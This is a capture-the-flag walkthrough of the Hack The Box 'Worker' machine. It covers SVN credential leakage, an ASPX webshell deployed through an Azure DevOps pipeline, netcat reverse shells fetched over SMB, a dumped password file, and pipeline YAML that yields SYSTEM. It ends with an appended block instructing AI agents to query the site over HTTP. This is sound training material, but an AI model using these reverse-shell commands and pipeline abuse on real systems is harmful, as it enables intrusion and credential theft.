# Worker ![](/files/LoxNw96mzPMRFsCDrpIz) ## Enumeration As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.203 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. ``` # Nmap 7.92 scan initiated Sun Jul 3 15:38:10 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.203 Nmap scan report for 10.10.10.203 Host is up (0.067s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 3690/tcp open svn 5985/tcp open wsman # Nmap done at Sun Jul 3 15:38:36 2022 -- 1 IP address (1 host up) scanned in 26.52 seconds ``` Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file: > nmap -sC -sV -p80,3690,5985 10.10.10.203 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. ``` # Nmap 7.92 scan initiated Sun Jul 3 15:38:59 2022 as: nmap -sCV -p80,3690,5985 -oN targeted 10.10.10.203 Nmap scan report for worker.htb (10.10.10.203) Host is up (0.083s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: IIS Windows Server | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 3690/tcp open svnserve Subversion 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Jul 3 15:39:08 2022 -- 1 IP address (1 host up) scanned in 9.48 seconds ``` Ports 80 (HTTP), which may have a website, port 3690 (Subversion) and port 5985 (WinRM) are open. If we take a look at the website, we'll see the default IIS page. ![](/files/yLrGLj0hrVjaVG2hwfEb) As we saw in the *nmap* report, port 3690 is open. We could try to enumerate the *Subversion* server. To enumerate the server, run the following command. > svn ls snv://10.10.10.203 ``` dimension.worker.htb/ moved.txt ``` There is some content in it. Let's download the content of the *Subversion* server. > svn checkout svn://10.10.10.203 ``` A dimension.worker.htb A dimension.worker.htb/LICENSE.txt A dimension.worker.htb/README.txt A dimension.worker.htb/assets A dimension.worker.htb/assets/css A dimension.worker.htb/assets/css/fontawesome-all.min.css A dimension.worker.htb/assets/css/main.css A dimension.worker.htb/assets/css/noscript.css A dimension.worker.htb/assets/js A dimension.worker.htb/assets/js/breakpoints.min.js A dimension.worker.htb/assets/js/browser.min.js A dimension.worker.htb/assets/js/jquery.min.js A dimension.worker.htb/assets/js/main.js A dimension.worker.htb/assets/js/util.js A dimension.worker.htb/assets/sass A dimension.worker.htb/assets/sass/base A dimension.worker.htb/assets/sass/base/_page.scss A dimension.worker.htb/assets/sass/base/_reset.scss A dimension.worker.htb/assets/sass/base/_typography.scss A dimension.worker.htb/assets/sass/components A dimension.worker.htb/assets/sass/components/_actions.scss A dimension.worker.htb/assets/sass/components/_box.scss A dimension.worker.htb/assets/sass/components/_button.scss A dimension.worker.htb/assets/sass/components/_form.scss A dimension.worker.htb/assets/sass/components/_icon.scss A dimension.worker.htb/assets/sass/components/_icons.scss A dimension.worker.htb/assets/sass/components/_image.scss A dimension.worker.htb/assets/sass/components/_list.scss A dimension.worker.htb/assets/sass/components/_table.scss A dimension.worker.htb/assets/sass/layout A dimension.worker.htb/assets/sass/layout/_bg.scss A dimension.worker.htb/assets/sass/layout/_footer.scss A dimension.worker.htb/assets/sass/layout/_header.scss A dimension.worker.htb/assets/sass/layout/_main.scss A dimension.worker.htb/assets/sass/layout/_wrapper.scss A dimension.worker.htb/assets/sass/libs A dimension.worker.htb/assets/sass/libs/_breakpoints.scss A dimension.worker.htb/assets/sass/libs/_functions.scss A dimension.worker.htb/assets/sass/libs/_mixins.scss A dimension.worker.htb/assets/sass/libs/_vars.scss A dimension.worker.htb/assets/sass/libs/_vendor.scss A dimension.worker.htb/assets/sass/main.scss A dimension.worker.htb/assets/sass/noscript.scss A dimension.worker.htb/assets/webfonts A dimension.worker.htb/assets/webfonts/fa-brands-400.eot A dimension.worker.htb/assets/webfonts/fa-brands-400.svg A dimension.worker.htb/assets/webfonts/fa-brands-400.ttf A dimension.worker.htb/assets/webfonts/fa-brands-400.woff A dimension.worker.htb/assets/webfonts/fa-brands-400.woff2 A dimension.worker.htb/assets/webfonts/fa-regular-400.eot A dimension.worker.htb/assets/webfonts/fa-regular-400.svg A dimension.worker.htb/assets/webfonts/fa-regular-400.ttf A dimension.worker.htb/assets/webfonts/fa-regular-400.woff A dimension.worker.htb/assets/webfonts/fa-regular-400.woff2 A dimension.worker.htb/assets/webfonts/fa-solid-900.eot A dimension.worker.htb/assets/webfonts/fa-solid-900.svg A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf A dimension.worker.htb/assets/webfonts/fa-solid-900.woff A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2 A dimension.worker.htb/images A dimension.worker.htb/images/bg.jpg A dimension.worker.htb/images/overlay.png A dimension.worker.htb/images/pic01.jpg A dimension.worker.htb/images/pic02.jpg A dimension.worker.htb/images/pic03.jpg A dimension.worker.htb/index.html A moved.txt Checked out revision 5. ``` If we look in our current directory, we'll see the `dimension.worker.htb` directory, and the `moved.txt` file. Let's take a look at that file. > cat moved.txt ``` This repository has been migrated and will no longer be maintaned here. You can find the latest version at: http://devops.worker.htb // The Worker team :) ``` Now that we know a few domain names, let's add them to the `/etc/hosts` file. > nano /etc/hosts ``` # Host addresses 127.0.0.1 localhost 127.0.1.1 alfa8sa ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes f02::2 ip6-allrouters 10.10.10.203 worker.htb dimension.worker.htb devops.worker.htb ``` We could also see the commits that have been made. > svn log svn://10.10.10.203 ``` ------------------------------------------------------------------------ r5 | nathen | 2020-06-20 15:52:00 +0200 (Sat, 20 Jun 2020) | 1 line Added note that repo has been migrated ------------------------------------------------------------------------ r4 | nathen | 2020-06-20 15:50:20 +0200 (Sat, 20 Jun 2020) | 1 line Moving this repo to our new devops server which will handle the deployment for us ------------------------------------------------------------------------ r3 | nathen | 2020-06-20 15:46:19 +0200 (Sat, 20 Jun 2020) | 1 line - ------------------------------------------------------------------------ r2 | nathen | 2020-06-20 15:45:16 +0200 (Sat, 20 Jun 2020) | 1 line Added deployment script ------------------------------------------------------------------------ r1 | nathen | 2020-06-20 15:43:43 +0200 (Sat, 20 Jun 2020) | 1 line First version ------------------------------------------------------------------------ ``` As we can see, all the commits have been made by the `nathen` user. Let's see the content of the `r2` commit. > svn up -r 2 ``` Updating '.': D moved.txt A deploy.ps1 Updated to revision 2. ``` Now we have the `deploy.ps1` file. Let's take a look at it. > cat deploy.ps1 ```powershell $user = "nathen" $plain = "wendel98" $pwd = ($plain | ConvertTo-SecureString) $Credential = New-Object System.Management.Automation.PSCredential $user, $pwd $args = "Copy-Site.ps1" Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args") ``` Now we have some credentials. Let's take a look at the `dimension.worker.htb` site, and see if there is any virtual hosting. ![](/files/kAZVN3ljseuLpXk6P0KG) Not much going on. Let's take a look now at the `devops.worker.htb` site. ![](/files/8kQwlwl6TIhkAuBOwe7v) Let's try to log in with the found credentials. ![](/files/ELDJtP37ZwC4kohNr2XK) And we get it. ![](/files/7IfvtN8wm5jj4S99o501) ## Exploitation Let's click on the `SmartHotel360` project. ![](/files/xEwzTdkGVGBpWGSiJiWI) From the `Repos` section we can see all the subdomains of the `worker.htb` domain. The idea here is to upload a `.aspx` webshell, that you can download from here, to one of the subdomains sites, for example the `alpha.worker.htb`. To do it, select the alpha repository, and click on `Upload file(s)`. ![](/files/RqOoQtuk4FjDY2taxqya) Then select the `cmd.aspx` file and hit on `Commit`. ![](/files/0J5Bx5z1Cs5eT0truRDH) But we get an error because we can not change the *master* branch. So let's go back, and create a new branch. ![](/files/Ah5P6ul9p5Ro9cDu0PPx) Let's call it `webshell`. ![](/files/bZMcyU5x1uDpaZmgFGJR) Then, upload the `cmd.aspx` webshell to the `webshell` branch. ![](/files/sKjEjOwBvafBuOXF866I) Then, click on `Create a pull request`. ![](/files/WmOpicUK5enJFG3WebXl) And click on `Create`. ![](/files/AQOnDZm1fYUfH0x9WZdW) Then, click on `Approve`. ![](/files/Gs289xqcLW2bjZKXIey7) Now, from the `Pipelines` section, let's run the `Alpha-CI` pipeline. ![](/files/bsG1ak4JJNZSR9e4yySi) And select the `webshell` branch. ![](/files/ja8ylivEr5E3RlRAdp0f) Finally, the `cmd.aspx` file is in the master branch, and we can access it from the browser. > ![](/files/AK1Cr4K9LMurI2FzIbqy) Time to get a shell. First, let's set a netcat listener on port 4444. > rlwrap nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Now, let's set an SMB server on the directory where the `nc.exe` binary is located. > impacket-smbserver smbFolder $(pwd) -smb2support Finally, if we execute the `cmd.exe` program with the following parameters on the webshell, we'll get a reverse shell as the `iis apppool\defaultapppool` user. > c:\windows\system32\cmd.exe > > /c \10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444 ``` listening on [any] 4444 ... connect to [10.10.14.15] from (UNKNOWN) [10.10.10.203] 49865 Microsoft Windows [Version 10.0.17763.1282] (c) 2018 Microsoft Corporation. All rights reserved. whoami whoami iis apppool\defaultapppool ``` ## Privilege Escalation Enumerating the system, we could guess that the user flag is inside the `robisl` home directory. > dir \users ``` Volume in drive C has no label. Volume Serial Number is 32D6-9041 Directory of c:\users 2020-07-07 17:53 . 2020-07-07 17:53 .. 2020-03-28 15:59 .NET v4.5 2020-03-28 15:59 .NET v4.5 Classic 2020-08-18 00:33 Administrator 2020-03-28 15:01 Public 2020-07-22 01:11 restorer 2020-07-08 19:22 robisl 0 File(s) 0 bytes 8 Dir(s) 10�490�904�576 bytes free ``` At this point, something that we could do is enumerate the logical disks available on the system. > wmic logicaldisk get name ``` Name C: W: ``` There is the `W:` logical disk. Let's enumerate it. > dir W: ``` Volume in drive W is Work Volume Serial Number is E82A-AEA8 Directory of W:\ 2020-06-16 18:59 agents 2020-03-28 15:57 AzureDevOpsData 2020-04-03 11:31 sites 2020-06-20 16:04 svnrepos 0 File(s) 0 bytes 4 Dir(s) 18�768�314�368 bytes free ``` Inside the `svnrepos` directory, we could find the `\svnrepos\www\conf\passwd` file, which contains a lot of credentials, including the `nathen` and `robisl` users. > type W:\svnrepos\www\conf\passwd ``` ### This file is an example password file for svnserve. ### Its format is similar to that of svnserve.conf. As shown in the ### example below it contains one section labelled [users]. ### The name and password for each user follow, one account per line. [users] nathen = wendel98 nichin = fqerfqerf nichin = asifhiefh noahip = player nuahip = wkjdnw oakhol = bxwdjhcue owehol = supersecret paihol = painfulcode parhol = gitcommit pathop = iliketomoveit pauhor = nowayjose payhos = icanjive perhou = elvisisalive peyhou = ineedvacation phihou = pokemon quehub = pickme quihud = kindasecure rachul = guesswho raehun = idontknow ramhun = thisis ranhut = getting rebhyd = rediculous reeinc = iagree reeing = tosomepoint reiing = isthisenough renipr = dummy rhiire = users riairv = canyou ricisa = seewhich robish = onesare robisl = wolves11 robive = andwhich ronkay = onesare rubkei = the rupkel = sheeps ryakel = imtired sabken = drjones samken = aqua sapket = hamburger sarkil = friday ``` We could try the credentials for the `robisl` user on the `devops.worker.htb` website. ![](/files/uoskoZhbnh8cX1toJcV4) Now we see the `PartsUnlimited` project. ![](/files/mxbi44trSPjxccN9hOtV) This project only has one repository. ![](/files/D9sOjYjApVQrJWjbRja8) From the `Project setings > Security` we can see that the `robisl` user is a member of the `Build Administrators` group, so we can create pipelines. ![](/files/uirv35jCWTEqMzMW093Q) Let's go the `Pipelines` section, and create a new pipeline. ![](/files/sqXEHlIBIQhv5VBd4KmD) Then, select the `Azure Repos Git` option. ![](/files/P2V9qMk418F8ZGEzgrua) Then, select the `PartsUnlimited` project. ![](/files/GjfOwFjxoLqZ38YaWHCW) Now, select the `Starter pipeline`. ![](/files/GJ0MXhWyq11cgASzFens) Then, we will configure the *YAML* file by changing the pool value to `Setup`. As the agent pool is called that way. ![](/files/i3x7upni2bQznTPHTOfa) And then we'll change the script value to a command which will send us a reverse shell. ![](/files/9uOlKzr4a0P53YcMUHqW) ```yaml # Starter pipeline # Start with a minimal pipeline that you can customize to build and deploy your code. # Add steps that build, run tests, deploy, and more: # https://aka.ms/yaml trigger: - master pool: 'Setup' steps: - script: echo Hello, world! displayName: 'Run a one-line script' - script: \\10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444 displayName: 'Run a multi-line script' ``` Make sure to still have the SMB server set on the directory where the `nc.exe` binary is. Then let's set another netcat listener on port 4444. > rlwrap nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Then, click on `Save and run`, and select the `Create a new branch for this commit and start a pull request` option. Then click on `Save and run`. ![](/files/bwJW8zgQBA8HH01LqXkY) Then, we'll have to wait for a bit, and we'll get a shell as the `nt authority\system` user. Then all we have to do is reap the harvest and take the root flag. ``` listening on [any] 4444 ... connect to [10.10.14.15] from (UNKNOWN) [10.10.10.203] 50077 Microsoft Windows [Version 10.0.17763.1282] (c) 2018 Microsoft Corporation. All rights reserved. whoami nt authority\system type C:\users\administrator\desktop\root.txt da8deb09764e1567ed487b8ba21c6703 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/windows-machines/worker.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.